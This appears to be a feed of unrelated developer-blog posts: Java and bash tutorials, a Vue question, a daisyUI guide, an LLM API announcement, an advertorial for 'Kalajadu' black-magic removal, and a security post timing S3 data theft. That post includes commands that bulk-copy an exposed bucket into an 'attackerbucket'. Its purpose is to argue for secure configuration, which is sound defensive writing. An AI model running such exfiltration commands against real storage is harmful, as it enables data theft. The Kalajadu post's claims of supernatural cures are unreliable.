##Problem Statement: Average Temperature Calculation You are tasked with implementing a Java method that calculates and prints the average temperature for each city from given arrays of cities and temperatures. Constraints: You are provided with two arrays: `String[] cities`: An array where each element represents the name of a city. `int[] temperatures`: An array where each element represents the temperature recorded for the corresponding city in the cities array. > The length of both arrays will be the same. > Duplicate city names may exist in the cities array, and the subsequent indices of temperatures should be considered for calculating the average temperature of each city. > Temperatures are represented as integers. Example: Given the following arrays: ``` String[] cities = {"New York", "Chicago", "New York", "Chicago", "Los Angeles"}; int[] temperatures = {75, 70, 80, 72, 85}; ``` Your method should output: ``` Average temperature in New York: 77.5 Average temperature in Chicago: 71.0 Average temperature in Los Angeles: 85.0 ``` ----------------------------------------- ##Solution ```java // a Pair class in created to keep track of total temperatures and sum of temperature private static class Pair{ public int temperature; public int total; public void addNewTemperature(int temperature ){ this.temperature = this.temperature +temperature ; this.total = this.total+1; } public double calculateAvgTemperature() { return (double) temperature / total; } } ``` ```java private static void printAverageTemperature(String[] cities, int[] temperatures) { Map<String,Pair> citiesMap = new HashMap<>(); for (int i = 0; i < cities.length; i++) { String currentCity = cities[i]; // fetch existing pair or create new for current city Pair pair = citiesMap.get(currentCity) == null ? new Pair() : citiesMap.get(currentCity); // this will add new temperature to exiting, and increment total by 1 pair.addNewTemperature(temperatures[i]); // add pair obj to map citiesMap.put(currentCity,pair); } citiesMap.forEach( (key,pair)->{ System.out.println(key +": "+pair.calculateAvgTemperature()); }); } ```
manishthakurani
1,909,042
How does Kalajadu removal function differently from other methods of spiritual clearing
Introduction: The issue of Kalajadu removal resonates deeply with many cultures and belief systems...
0
2024-07-02T14:29:39
https://dev.to/astrologer_sharma_53a12bd/how-does-kalajadu-removal-function-differently-from-other-methods-of-spiritual-clearing-3ck0
Introduction: The issue of [Kalajadu removal](https://www.bestpsychichealers.com/) resonates deeply with many cultures and belief systems throughout the world. In order to understand how it differents from other methods of spiritual clearing, it is necessary to examine its principles, practices, and cultural contexts. We explore this fascinating topic in the following article. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/j2odba52yyecwn7re67w.png) Understanding Kalajadu Removal: Kalajadu is often perceived as a malevolent form of magic practiced with ill intent to harm others through supernatural means. Those who believe they are affected by Kalajadu may experience a range of distressing symptoms, from physical ailments to psychological disturbances and unexplained misfortunes in life. Principles of Kalajadu Removal : Kalajadu removal operates on the premise that the negative effects of black magic can be identified, neutralized, and ultimately eradicated through specific rituals, prayers, and spiritual interventions. Unlike general spiritual clearing or purification methods, which focus on cleansing one’s aura or environment from negative energies, Kalajadu removal aims to specifically counteract the harmful spells and influences cast by practitioners of black magic. Differentiating Factors : Targeted Approach: Kalajadu removal techniques are highly specialized and often require practitioners with specific knowledge and skills in identifying and combating black magic spells. This targeted approach contrasts with broader spiritual clearing methods that may focus on general purification and positive energy enhancement. Cultural Context: The practice of Kalajadu removal is deeply embedded in cultural and religious contexts where beliefs in black magic and its consequences are prevalent. This cultural sensitivity influences the rituals, prayers, and remedies used in Kalajadu removal, making it distinct from more universal spiritual practices. Complex Rituals and Mantras: Kalajadu removal often involves intricate rituals, recitations of sacred mantras (chants), and offerings aimed at appeasing deities or spirits believed to have the power to counteract and neutralize black magic effects. These rituals may vary widely depending on regional traditions and the severity of the perceived black magic affliction. Consultation with Specialists: Those seeking Kalajadu removal typically consult specialists or practitioners who have specific knowledge and experience in dealing with black magic. These practitioners may be priests, spiritual healers, or individuals recognized within their communities for their expertise in combating negative supernatural influences. Psychological and Emotional Support: Beyond the ritualistic aspects, Kalajadu removal often includes providing psychological and emotional support to individuals affected by black magic. This holistic approach acknowledges the mental distress and fear that often accompany beliefs in supernatural afflictions. Methods Used in Kalajadu Removal : Purification Rituals: Rituals involving the use of holy water, sacred herbs, or incense to cleanse the affected person or space from negative energies associated with Kalajadu. Prayer and Meditation: Intensive prayer sessions and meditation practices aimed at invoking divine protection and strength to combat the effects of black magic. Offerings and Sacrifices: Offering specific items or performing sacrificial rituals as appeasement to deities or spirits believed to be involved in the black magic. Divination and Diagnosis: Using divination tools such as astrology, tarot cards, or spiritual consultations to diagnose the nature and source of the black magic affliction. Amulets and Talismans: Providing individuals with protective amulets or talismans believed to ward off negative energies and provide ongoing protection against future black magic attacks. Effectiveness and Challenges : The effectiveness of Kalajadu removal practices is often measured by the alleviation of symptoms and the restoration of peace and well-being in the affected individual’s life. However, challenges may arise due to varying beliefs, cultural interpretations, and the subjective nature of perceived black magic afflictions. Conclusion : [Kalajadu removal ](https://www.bestpsychichealers.com/)functions differently from other methods of spiritual clearing primarily due to its specialized focus on combating the specific harms caused by black magic. It involves complex rituals, cultural sensitivities, and a deep-seated belief in supernatural influences that shape its unique approach. By understanding these differences, individuals seeking Kalajadu removal can make informed decisions about the methods and practitioners they choose to consult in their quest for spiritual healing and protection. Contact Us: Call: +19297549009 Website: [www.bestpsychichealers.com](https://www.bestpsychichealers.com/)
astrologer_sharma_53a12bd
1,909,030
Automating User and Group Creation Using Bash script
Automating the creation of users and groups can help with administrative tasks and ensure adequate...
0
2024-07-02T14:29:39
https://dev.to/adebimpe_peter_285cdfed0c/automating-user-and-group-creation-using-bash-script-a00
bash, linux
Automating the creation of users and groups can help with administrative tasks and ensure adequate consistency across systems. This demonstrates how to create a Bash script that reads user and group information from a file and processes it accordingly. **Below is a Bash script that reads from a file called users.txt, which contains usernames and groups, and then creates the users and groups on the system.** ``` #!/bin/bash # Check if running as root if [[ $UID -ne 0 ]]; then echo "This script must be run as root" exit 1 fi # Define the input file, log file, and secure password file INPUT_FILE="$1" LOG_FILE="/var/log/user_management.log" PASSWORD_FILE="/var/secure/user_passwords.csv" # Check if the input file was provided and exists if [[ -z "$INPUT_FILE" ]]; then echo "No input file provided." exit 1 fi if [[ ! -f "$INPUT_FILE" ]]; then echo "File $INPUT_FILE not found." exit 1 fi # Create the log file and password file if they don't exist touch "$LOG_FILE" mkdir -p /var/secure touch "$PASSWORD_FILE" # Function to generate a random password generate_password() { tr -dc A-Za-z0-9 </dev/urandom | head -c 12 } # Function to log messages log_message() { echo "$1" | tee -a "$LOG_FILE" } log_message "Backing up created files" # Backup existing files cp "$PASSWORD_FILE" "${PASSWORD_FILE}.bak" cp "$LOG_FILE" "${LOG_FILE}.bak" # Set permissions for password file chmod 600 "$PASSWORD_FILE" # Read the input file line by line while IFS=';' read -r username groups || [[ -n "$username" ]]; do # Ignore whitespace username=$(echo "$username" | sed 's/ //g') groups=$(echo "$groups" | sed 's/ //g') # Parse the username and groups echo "$username" echo "$groups" # Create the user and their personal groups if they don't exist if id "$username" &>/dev/null; then log_message "User $username already exists. Skipping..." else # Create personal groups for the user groupadd "$username" # Create user with their personal groups useradd -m -s /bin/bash -g "$username" "$username" if [ $? -eq 0 ]; then log_message "User $username created with home directory." else log_message "Failed to create user $username." continue fi # Generate a random password and set it for the user PASSWORD=$(generate_password) echo "$username,$PASSWORD" if [ $? -eq 0 ]; then log_message "Password for user $username set." else log_message "Failed to set password for user $username." fi # Store the password securely echo "$username,$PASSWORD" >> "$PASSWORD_FILE" # Set the correct permissions for the home directory chmod 700 /home/"$username" chown "$username":"$username" /home/"$username" log_message "Home directory permissions set for user $username." fi # Add user to additional groups if [ -n "$groups" ]; then IFS=',' read -r -a groups_ARRAY <<< "$groups" for groups in "${groups_ARRAY[@]}"; do # Create groups if it doesn't exist if ! getent group "$groups" > /dev/null 2>&1; then groupadd "$groups" log_message "group $groups created." fi # Add user to the groups usermod -a -G "$groups" "$username" if [ $? -eq 0 ]; then log_message "User $username added to groups $groups." else log_message "Failed to add user $username to groups $groups." fi done fi done < "$INPUT_FILE" log_message "User creation process completed." ``` ## Breakdown of the script Check if Running as Root: ``` if [[ $UID -ne 0 ]]; then echo "This script must be run as root" exit 1 fi ``` Define Input, Log, and Password Files: ``` INPUT_FILE="$1" LOG_FILE="/var/log/user_management.log" PASSWORD_FILE="/var/secure/user_passwords.csv" ``` Check if Input File Exists: ``` if [[ -z "$INPUT_FILE" ]]; then echo "No input file provided." exit 1 fi if [[ ! -f "$INPUT_FILE" ]]; then echo "File $INPUT_FILE not found." exit 1 fi ``` Create Log and Password Files: ``` touch "$LOG_FILE" mkdir -p /var/secure touch "$PASSWORD_FILE" ``` Generate Random Password and log message functions: ``` generate_password() { tr -dc A-Za-z0-9 </dev/urandom | head -c 12 } log_message() { echo "$1" | tee -a "$LOG_FILE" } ``` Backup Existing Files: ``` log_message "Backing up created files" cp "$PASSWORD_FILE" "${PASSWORD_FILE}.bak" cp "$LOG_FILE" "${LOG_FILE}.bak" ``` Set Permissions for Password File: ``` chmod 600 "$PASSWORD_FILE" ``` Read Input File and Process Each Line: ``` while IFS=';' read -r username groups || [[ -n "$username" ]]; do username=$(echo "$username" | sed 's/ //g') groups=$(echo "$groups" | sed 's/ //g') ``` Create User and Groups: ``` if id "$username" &>/dev/null; then log_message "User $username already exists. Skipping..." else groupadd "$username" useradd -m -s /bin/bash -g "$username" "$username" if [ $? -eq 0 ]; then log_message "User $username created with home directory." else log_message "Failed to create user $username." continue fi PASSWORD=$(generate_password) echo "$username,$PASSWORD" if [ $? -eq 0 ]; then log_message "Password for user $username set." else log_message "Failed to set password for user $username." fi echo "$username,$PASSWORD" >> "$PASSWORD_FILE" chmod 700 /home/"$username" chown "$username":"$username" /home/"$username" log_message "Home directory permissions set for user $username." fi ``` Add User to Additional Groups: ``` if [ -n "$groups" ]; then IFS=',' read -r -a groups_ARRAY <<< "$groups" for groups in "${groups_ARRAY[@]}"; do if ! getent group "$groups" > /dev/null 2>&1; then groupadd "$groups" log_message "group $groups created." fi usermod -a -G "$groups" "$username" if [ $? -eq 0 ]; then log_message "User $username added to groups $groups." else log_message "Failed to add user $username to groups $groups." fi done fi ``` Complete User Creation Process: ``` done < "$INPUT_FILE" log_message "User creation process completed." ``` Example users.txt File Here is an example of what the users.txt file might look like: ``` light; umanager,datadev,devops tosingh; datadev,devops peter; umanager ``` **Running the Script** 1. Save the script to a file, e.g., create_users.sh. 2. Ensure the script is executable 3. Run the script with the input file as an argument ``` chmod +x create_users.sh sudo ./create_users.sh users.txt ``` After running , the password and log location should contain information needed. you can learn more about this and so much more by registering on HNG - https://hng.tech/internship - https://hng.tech/premium
adebimpe_peter_285cdfed0c
1,909,041
Gone in 120 seconds
This article was originally published on the Resourcely blog, and is guest-written by Haoxi...
0
2024-07-02T14:25:44
https://dev.to/resourcely/gone-in-60-seconds-3gcl
security, cybersecurity, hacks
This article was [originally published](https://www.resourcely.io/post/cloud-exfil-speed) on the Resourcely blog, and is guest-written by Haoxi Tan. There's been a significant increase in the number of SaaS and cloud based data breaches, from [API abuse](https://www.bleepingcomputer.com/news/security/trello-api-abused-to-link-email-addresses-to-15-million-accounts/), data theft from [exposed cloud assets](https://www.bleepingcomputer.com/news/security/misconfigured-firebase-instances-leaked-19-million-plaintext-passwords/), to straight up "login and exfil" using stolen credentials (such as in the case of the [Snowflake hacking spree](https://arstechnica.com/security/2024/06/ticketmaster-and-several-other-snowflake-customers-hacked/)), with cloud based data breaches show no signs of slowing down. Cloud providers like AWS, GCP, and Azure are called "Public Cloud" for a reason - anyone can sign up and use them, including attackers. It takes minutes for an attacker to open a new account and get access to virtually unlimited data storage and compute, often hosted in the same high-speed data centers as their victim's assets. ## Cloud-to-cloud exfiltration Let's take a classic example of bad actors stealing data: copying files from a publicly available AWS S3 bucket. If an attacker is downloading files from the S3 bucket to their local machine, the speed would depend on how fast their internet is, how many hops they are using for VPN, and so on. However, even with a very slow network speed and the default AWS API client, they can easily download up to 20 files a second to their local machine by running a simple command:‍ `aws s3 cp s3://bucketname . --recursive` ![Exfiltration log results using s3p](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rsfi3vi5zrt35dpxzaiq.png) This command was run behind a VPN on a home network connection (with average 10MB/s of internet speed) for about 200 seconds. The default aws cli isn't very fast, and was only able to utilize a small part of the bandwidth and download at around 140 KB/s), and yet it was able to download around 4000 files from an open S3 bucket in 200 seconds. Using an optimized tool called s3p, which massively parallelizes S3 API calls to perform the data exfiltration in the same network environment, achieved much better results: over 800 files per second at top speed: `s3p cp --bucket bucketname --to-folder` ![Exfiltration log results using s3p](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fgq4he442422qzmlpc11.png) Even worse, if an attacker runs s3p on an EC2 instance in the same cloud region as their victim's data to copy the files into their own S3 bucket, the transfer would be processed entirely from inside the cloud provider's data centers, like so: `s3p cp --bucket bucketname --to-bucket attackerbucket` They can copy all the data to their own AWS account at massive speeds, then use other VPS (Virtual Private Server) instances in [bulletproof hosting](https://en.wikipedia.org/wiki/Bulletproof_hosting) providers to exfiltrate that data outside of AWS where takedown is much more difficult. ![A summary table of results exfiltrating data](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/eyptjiygwdq2hr3ipbf7.png) Using s3p on a EC2 instance to optimize the number of API calls, cloud-to-cloud transfers could reach up to 8 gigabytes per second. That means for an exposed S3 bucket with 1TB of data, it could all end up in the attacker's AWS account in just over 2 minutes. By the time the incident is detected, the data would have already ended up for sale in a hacking forum. ## APT: Advanced Persistent Teenagers As companies move their assets to the cloud and migrate from on-premise applications to SaaS apps, attackers are constantly innovating. One particular Advanced Persistent Threat (APT) group called [Scattered Spider](https://attack.mitre.org/groups/G1015/) (a.k.a. Octo Tempest) is a group of English-speaking teenagers particularly well versed in exploiting cloud-based applications and services. ![Screenshot of a news article mentioning Scattered Spider](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yl6pn67g5eu1tfprg65f.png) The group had focused on SIM swapping attacks and ransomware in the past to gain access to large companies, but recently pivoted towards [data theft attacks in cloud and SaaS systems](https://www.bleepingcomputer.com/news/security/scattered-spider-hackers-switch-focus-to-cloud-apps-for-data-theft/) for extortion purposes without deploying ransomware. Octo Tempest was named [one of the most dangerous financial hacking groups by Microsoft](https://www.bleepingcomputer.com/news/security/microsoft-octo-tempest-is-one-of-the-most-dangerous-financial-hacking-groups/), and it's gone cloud native. ![Cloud-based MITRE ATT&CK techniques employed by Scattered Spider](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0ofxkuau9t2v94n6em0l.png) Google's Mandiant [said](https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications/) that after the reconnaissance phase, the group performs "exfiltration from SaaS applications through cloud synchronization utilities, such as Airbyte and Fivetran, to move data from cloud-hosted data sources to external attacker-owned cloud storage resources, such as S3 buckets''. ## No response fast enough With the speed of the cloud and attackers moving away from ransomware deployment to extortion via data theft, it's virtually impossible to respond fast enough to these incidents. Once an exposed, misconfigured cloud asset has been discovered by attackers, exfiltration can start in a matter of seconds. Unlike ransomware, which moves across different systems with suspicious hands-on-keyboard activity that can be detected by Endpoint Detection and Response, data exfiltration activity in the cloud looks much like normal data access, and once the data is lost it cannot be recovered by incident response. ![Screenshot of AWS CloudTrail documentation](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9tbyli1u2ouotc7403cw.png) CloudTrail is the logging service for AWS, central to all other tooling that analyzes logs for security events. The CloudTrail FAQ page notes that an API call event is usually delivered from CloudTrail within 5 minutes (300 seconds) of the API call. Given that the top speed of data exfiltration above is 8GB/s, that gives an attacker the ability to exfiltrate around 2TB of data before the event log is even delivered to your security tooling - and by that point your data is long gone. ## Secure configuration is the only prevention Given there is not enough time to react to a misconfigured cloud asset being breached, proactively securing configuration is the only way to protect against the risk of potential cloud data breaches. To do that, security teams must shift from a reactive, issue-centric view of the world to a proactive, preventative strategy, powered by secure, sensible defaults for configuring cloud resources. Resourcely enables your security, infrastructure and developer teams to create proactive, simple, continuously enforced guardrails to safeguard your cloud resources. [Get started with Resourcely](https://www.resourcely.io/sign-up) to make your organization secure-by-default. Massive shoutout to Jason Craig and Will Bengtson, who had the initial idea for this post.
csreuter
1,908,740
Automating User and Group Management in Linux with a Bash Script
Let's make your manual and tedious repetitive task of creating users and groups for new employees...
0
2024-07-02T14:23:56
https://dev.to/afolabi_harfoh/automating-user-and-group-management-in-linux-with-a-bash-script-2d8f
linux, devops, automation
Let's make your manual and tedious repetitive task of creating users and groups for new employees interesting with bash scripting to boost your productivity as a SysOps Engineer. Before we get into the task, this take was made possible by the HNG Internship, HNG is a prestigious program designed to empower young developers and designers with practical skills and experience in software development. Participants engage in real-world projects across various disciplines, including DevOps, web and mobile app development, UI/UX design, and more. This internship is renowned for its hands-on approach, remote work opportunities, and emphasis on collaborative learning and innovation. For more information about the HNG internship, you can visit their [official website](https://hng.tech/) and explore their [internship program](https://hng.tech/internship). ## **Introduction** As a sysops engineer, managing users and groups in a Linux system can be a time-consuming task. However, with the help of automation, this process can be streamlined and made more efficient. In this article, we will explore a bash script that automates the creation of users and groups, assigns users to existing groups, generates secure passwords, and securely stores them. This article walks you through a script that reads user data from a text file and performs these tasks, ensuring secure password generation and logging all actions. **_Prerequisites_** - Basic Knowledge of Linux Commands - Knowledge of the Bash Language - Admin privileges on the system - A text editor such as Nano, vim, vi, etc., or IDE such as VSCode. ## **Key Concepts** Before diving into the code, let's familiarize ourselves with some key concepts: 1. **Text File:** The script expects a text file as an argument. This file contains user and group information in the format username;group1,group2,group3. Each line represents a user, where username is the desired username, and group1, group2, group3 are the groups the user should be assigned to. 2. **Users:** Users are individuals who interact with a Linux system. Each user has a unique username and can belong to one or more groups. 3. **Groups:** Groups are collections of users with similar permissions and access rights. A user can belong to multiple groups. 4. **Automation:** Automation involves using scripts or tools to perform repetitive tasks automatically, reducing manual effort and increasing efficiency. 5. **Secure Passwords:** Secure passwords are randomly generated and provide a higher level of security compared to easily guessable passwords. **_Script Overview_** The provided bash script automates user and group management in Linux systems. Let's break down the code structure: - **Argument Check:** The script checks if a text file is provided as an argument. If not, it displays a usage message and exits. - **Secure Directory Creation:** The script creates a secure directory, /var/secure, to store passwords if it doesn't already exist. This directory is given appropriate permissions to ensure that only authorized users can access it. - **Text File Processing:** The script reads a text file line by line, where each line contains a username and a comma-separated list of groups the user should belong to. - **User and Group Creation:** For each line in the text file, the script performs the following actions: - Checks if the username is empty. If so, it skips to the next line. - Checks if the user already exists. If so, it skips to the next line. - Checks if the group already exists. If not, it creates the group. - Assigns the user to existing groups. - Creates the user and adds them to the specified groups. - Generates a random password for the user. - Sets the password for the user and securely stores it in /var/secure/user_passwords.txt. - **Permissions Setting:** The script sets appropriate permissions for the user_passwords.txt file to ensure it is only accessible by authorized users. - **Completion Message:** Finally, the script displays a completion message and suggests checking the /var/log/user_management.log file for detailed information. **Script Breakdown** Here’s a detailed explanation of the script: _**Argument Check:**_ ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8k73dje1tm6r668epwqb.png) This code snippet checks if the number of arguments provided is not equal to 1. If so, it displays a usage message indicating the correct way to run the script and exits with a non-zero status code. **_User and Group Creation:_** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ehgfamcqkjoe0occ7ey9.png) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/419hjji2rqim3cyx55b0.png) This code snippet reads the text file line by line, where each line contains a username and a comma-separated list of groups. It performs the following actions: - Skips the line if the username is empty. - Checks if the user already exists. If so, it skips to the next line. - Checks if the group already exists. If not, it creates the group. - Assigns the user to existing groups. **_Password Generation and Storage:_** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9t0hro9zh4r9gunhiwp3.png) This code snippet generates a random password using the openssl rand command and sets it for the user. It securely stores the username and password in the /var/secure/user_passwords.txt file for future reference. **Conclusion** Automating user and group management in Linux systems can greatly simplify the process and save valuable time for sysops engineers. The provided bash script automates the creation of users and groups, assigns users to existing groups, generates secure passwords, and securely stores them. By leveraging automation, sysops engineers can focus on more critical tasks while ensuring efficient user and group management in their Linux systems.
afolabi_harfoh
1,909,040
Access to Large Language Models via API from the Control panel!
We've launched a new service: now you can access large language models (LLM) via API directly from...
0
2024-07-02T14:21:38
https://dev.to/serverspace/access-to-large-language-models-via-api-from-the-control-panel-2de5
cloud, cloudcomputing, gpt, llm
We've launched a new service: now you can access large language models ([LLM](https://serverspace.us/services/serverspace-gpt-api/)) via API directly from your control panel. Multiple use cases: — **Automate customer support:** get accurate answers to user queries. — **Create content:** generate articles and promotional materials. — **Translate languages:** translate texts and documents instantly. — **Develop chatbots:** create smart virtual assistants to optimize business processes. In common with our partner Ainergy, we offer you access to the Openchat-3.5-0106 model, which outperforms Grok-1 and ChatGPT (version 3.5 dated March 2023) on popular benchmarks. We plan to expand the model library in the future. Want to learn more? Read the [full press release](https://serverspace.us/about/news/new-access-to-llm-via-api-from-the-control-panel/) on our website! _[Serverspace](https://serverspace.us/) is an international cloud provider offering automatic deployment of virtual infrastructure based on Linux and Windows from anywhere in the world in less than 1 minute. For the integration of client services, open tools like API, CLI, and Terraform are available._
serverspace
1,909,034
Unhandled Error during execution of scheduler flush.
Windows 11 Microsoft Edge v126.0.2592.81 Vue3 3.4.27 I have two vuetify select components...
0
2024-07-02T14:18:36
https://dev.to/keyboardkowboy/unhandled-error-during-execution-of-scheduler-flush-9a
vue
Windows 11 Microsoft Edge v126.0.2592.81 Vue3 3.4.27 I have two vuetify select components interacting with each other with a method, like so: ``` <v-select v-model="selectCountry" :items="dataCountries" @update:modelValue="selectedCountry" item-title="title" item-value="value" label="Countries" density="compact" /> <v-select v-model="selectState" :items="dataStates" :hint="`${selectState.title}, ${selectState.value}`" item-title="title" item-value="value" label="States" density="compact" /> selectedCountry() { let states = BFHStatesList.filter(country => country[this.selectCountry]); this.dataStates = states; this.$emit('selectedCountry', this.selectCountry); } ``` The first country select componet operates accordingly. When I select a country option, and then try to select a state, it does not fill, and I receive this error: > main.js:99 Invalid prop: type check failed for prop "title". Expected String | Number, got Object null at VListItem > at VirtualScrollItem > at VVirtualScroll > at VListChildren > at VList > at VDefaultsProvider > at BaseTransition > at Transition > at VDialogTransition > at MaybeTransition > at VOverlay > at VMenu > at VField > at VInput > at VTextField > at VSelect > at AdvanceServicesFilter > at DefaultFilter > at Services > at RouterView > at VLayout > at App > main.js:99 Unhandled error during execution of scheduler flush. This is likely a Vue internals bug. Please open an issue at https://github.com/vuejs/core . Proxy(Object) {…} at VListItemTitle > at VListItem > at VVirtualScrollItem > at VVirtualScroll > at VListChildren > at VList > at VDefaultsProvider > at BaseTransition > at Transition > at VDialogTransition at MaybeTransition at VOverlay at VMenu at VField at VInput at VTextField at VSelect at AdvanceServicesFilter at DefaultFilter at <Services> at <RouterView> at <VLayout> at <App>
keyboardkowboy
1,908,031
daisyUI adoption guide: Overview, examples, and alternatives
Written by David Omotayo✏️ daisyUI is an open source component library built on top of Tailwind CSS....
0
2024-07-02T14:18:29
https://blog.logrocket.com/daisyui-adoption-guide
daisyui, webdev
**Written by [David Omotayo](https://blog.logrocket.com/author/davidomotayo/)✏️** daisyUI is an open source component library built on top of Tailwind CSS. It’s designed to enhance the development experience for web designers and developers. In this adoption guide, we’ll explore the origins of daisyUI, its purpose, and how it addresses common challenges faced by frontend developers. This information should help you judge whether daisyUI is the right tool for your next project. * * * ## What is daisyUI? daisyUI is a Tailwind CSS plugin that provides a collection of pre-designed components, semantic color classes, and typography enhancements. Unlike traditional UI libraries, daisyUI integrates seamlessly with Tailwind, so you can create customizable and visually appealing interfaces without sacrificing its utility-first approach. To understand the background of daisyUI and why it was created, let’s take a brief history on the background of the library it’s built on (Tailwind) and the need to build a component library around it. ### The rise of Tailwind CSS and a new challenge Before Tailwind CSS, developers relied on traditional libraries like Bootstrap and YUI to speed up website and web application styling during development. However, these libraries offered default styles that were difficult to override and customize. As a result, many websites built with these tools ended up looking similar, lacking uniqueness and brand identity. This lack of flexibility encouraged developers to seek alternatives that provided more granular control over website appearance. For this reason, Tailwind CSS was created as a utility-first library with predefined classes that lets developers design websites directly in their markup. Tailwind’s flexibility and granular control addressed the limitations of traditional libraries, but a new challenge arose: bloated markups. While Tailwind gave developers the flexibility to create custom designs, the use of utility classes sometimes led to lengthy and repetitive markup. Styling even simple elements required multiple class names, resulting in larger HTML files. Developers needed a way to balance customization with maintainability. ### daisyUI: A response to bloated markups Pouya Saadeghi, a software engineer from Turkey, created daisyUI with the goal of balancing two common developer concerns: maintainability and customizability. Tailwind CSS offered improved customizability over traditional UI libraries, but had limited reusability and generated excessive code, which made maintaining projects challenging. Pouya was able to use Tailwind’s `@apply` directives a couple of times to combine multiple utility classes into a single class. The result was similar to how Bootstrap or other libraries work, but with the flexibility of Tailwind. So, Pouya decided to create a collection of these directives to reuse in future projects. Using his collection of `@apply` directives on a couple of personal projects showed Pouya how great and efficient it was. He decided to package his collection of `@apply` directives alongside pre-designed components to create a component library that combined the best of both worlds: the efficiency of utility classes and the reusability of components. And thus, daisyUI was born. #### _Further reading:_ * [daisyUI: Tailwind CSS components for reducing markup](https://blog.logrocket.com/daisyui-tailwind-components-react-apps/) * [Building reusable React components using Tailwind CSS](https://blog.logrocket.com/building-reusable-react-components-using-tailwind-css/) * * * ## How does daisyUI work? At its core, daisyUI leverages Tailwind’s `@apply` directives to combine basic utility classes for specific webpage elements into a single class. For example, to style a button element, daisyUI combines utility classes for padding, background color, text color, and other properties into a `btn` class: ```css .btn { @apply py-2 px-5 bg-violet-500 text-white font-semibold rounded-full shadow-md hover:bg-violet-700 focus:outline-none focus:ring focus:ring-violet-400 focus:ring-opacity-75; } ``` Assigning this class to a button element applies all the specified styles, with the flexibility to easily override default styles while maintaining consistency across your projects. daisyUI uses this foundation to offer a collection of pre-designed components that can be easily customized and integrated into any project using Tailwind CSS. This further improves DX and ensures consistencies across different parts of the application. We’ll learn more about these components later in this guide. * * * ## Why use daisyUI? Adopting daisyUI as a frontend developer is a no-brainer, considering how it significantly improves DX. This is particularly advantageous if you're already familiar with UI component libraries and styling with Tailwind utility classes. But let's cut through the hype – every UI library in the frontend scene seems like an obvious choice. So, how do you decide if dasiyUI is the right fit for you? The answer lies in considering its pros and cons, focusing on factors crucial for project success in both the short term and long term. Well, there are countless reasons why daisyUI stands out among the pack. But here are a few I think make dasiyUI a compelling choice: * **Performance**: daisyUI is designed to be lightweight and efficient. It leverages Tailwind utility classes, which are optimized for performance. While daisyUI provides pre-designed components, these components are not included by default, which ensures users only use components essential to their specific needs * **Ease of use**: daisyUI uses a developer-friendly syntax that streamlines the creation of complex UI components without the need for custom CSS. Additionally, it offers pre-built components that save development time. Since all of this is layered on Tailwind, it underscores the seamless transition for individuals who are already familiar with TailwindCSS * **Learning curve**: The learning curve for daisyUI is relatively shallow. Its consistent class naming conventions and comprehensive documentation make it accessible for developers of varying skill levels * **Customization**: Unlike traditional component libraries (e.g., Bootstrap), daisyUI components are highly customizable. You can adjust their appearance by adding or modifying utility classes * **Bundle size**: daisyUI uses pre-built styles, which might cause your project files to be slightly larger compared to using raw TailwindCSS. However, given Tailwind’s minimal footprint, the overhead this adds to your project isn't significant, as long as you avoid adding unnecessary styles and components, which could make your project files larger than necessary. Fortunately, if your project files do become too large, daisyUI offers the option to purge unused styles to reduce their size * **Community & ecosystem**: daisyUI is a relatively new library, but its user base has grown impressively. The library has amassed over 30k GitHub stars and boasts a community of active and supportive developers who regularly contribute by sharing tips, components, and best practices in forums * **Integration**: daisyUI is framework-agnostic, meaning it integrates well with other frontend libraries or frameworks. Whether you’re using React, Vue, or plain HTML/CSS, you can plug in dasiyUI effortlessly * **Documentation**: dasiyUI offers a comprehensive documentation. You’ll find clear examples, usage guidelines, and explanations for each component, ensuring a smooth DX While daisyUI offers undeniable advantages in terms of developer experience, it's not a one-size-fits-all solution and comes with its own set of drawbacks. Here are some of daisyUI cons you should be aware of before adopting it: * **Potential for bloat**: Because daisyUI uses a lot of directives under the hood, it has the tendency to bloat your project’s file size, particularly when you include too many large or unnecessary components * **Learning curve**: If you’re new to Tailwind CSS, understanding both utility classes and daisyUI components might be overwhelming initially * **JavaScript overhead**: Some daisyUI components rely on JavaScript for interactivity (e.g., dropdowns, modals, etc.). Integrating JavaScript libraries or writing custom scripts to handle these interactions adds overhead to your project. While this isn’t unique to daisyUI (many UI libraries have similar requirements), it’s essential to be aware of the trade-off between convenience and added complexity By weighing these factors and their benefits, you can make an informed decision about whether daisyUI is the right fit for your project. #### _Further reading:_ * [Exploring Catalyst, Tailwind’s UI kit for React](https://blog.logrocket.com/exploring-catalyst-tailwind-ui-kit-react/) * [Mojo CSS vs. Tailwind: Choosing the best CSS framework](https://blog.logrocket.com/mojo-css-vs-tailwind-choosing-best-css-framework/) * [11 best Tailwind CSS component and template collections](https://blog.logrocket.com/best-tailwind-css-component-template-collections/) * * * ## Getting started with daisyUI daisyUI offers two fairly straightforward methods for setting it up in your projects. You can either set it up as a Node package using popular package managers like npm, pnpm, yarn, and bun, or opt to use a CDN. There are a few things to note based on the method you choose to set up dasiyUI in your project. We’ll go over them in a bit. For now, let's look at how you can use these methods to integrate dasiyUI into your projects. ### Installing daisyUI as Node package To install daisyUI as a Node package, you need to fulfill the following prerequisites: * Install Node.js on your machine * [Install Tailwind CSS in your project](https://blog.logrocket.com/how-to-use-tailwind-css-react-vue-js/) Once you have completed these prerequisites, you can proceed to run the following command in your project's directory: ```bash npm i -D daisyui@latest ``` If you’re not using npm, you can replace `npm` with your [preferred package manager](https://blog.logrocket.com/javascript-package-managers-compared/). After the installation is complete, navigate to the `tailwind.config.js` file in your project's directory and make the following updates: ```javascript module.exports = { //... plugins: [require('daisyui')], } ``` This will add daisyUI as a plugin to your project’s Tailwind package. With that, you can start using dasiyUI classes and components in your project. ### Installing daisyUI using a CDN To set up daisyUI using a CDN, simply copy the `link` and `script` tags below and paste them into the head section of your HTML file: ```html <link href="https://cdn.jsdelivr.net/npm/daisyui@4.10.5/dist/full.min.css" rel="stylesheet" type="text/css" /> <script src="https://cdn.tailwindcss.com"></script> ``` That’s all you have to do install Tailwind and integrate 